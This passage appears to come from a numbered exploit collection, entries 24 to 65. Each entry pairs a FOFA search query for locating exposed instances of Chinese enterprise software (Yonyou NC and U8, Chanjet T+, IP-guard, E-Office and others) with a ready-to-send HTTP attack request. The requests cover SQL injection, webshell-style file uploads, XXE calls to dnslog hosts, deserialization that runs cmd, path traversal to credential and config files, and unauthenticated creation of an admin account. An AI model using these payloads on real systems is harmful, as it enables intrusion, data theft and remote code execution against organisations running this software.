User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
      "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
      }""
}


24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--


25. 用友 NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog



26. 用友 NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. 用友 NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. 用友 NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--


Uploaded file path: /uapim/static/pages/nc/head.jsp

29. 用友 NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. 用友 NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--


31. 用友 NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. 用友 NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. 用友 NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. 用友 NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. 用友 NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. 用友 NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. 用友 NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>



38. 用友 U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. 用友 U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. 用友 U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. 用友 GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD


Uploaded file path: http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. 用友 GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. 用友 GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close



48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. 用友U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata=&searchdata=1&searchdata=1&searchdata=1&searchdata=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata=1


51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. 泛微E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the following request to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"


Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
}
}
}


Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
"storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
         "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
         "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
}
}


57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
</soap:Body>
</soap:Envelope>


65. 优卡特脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


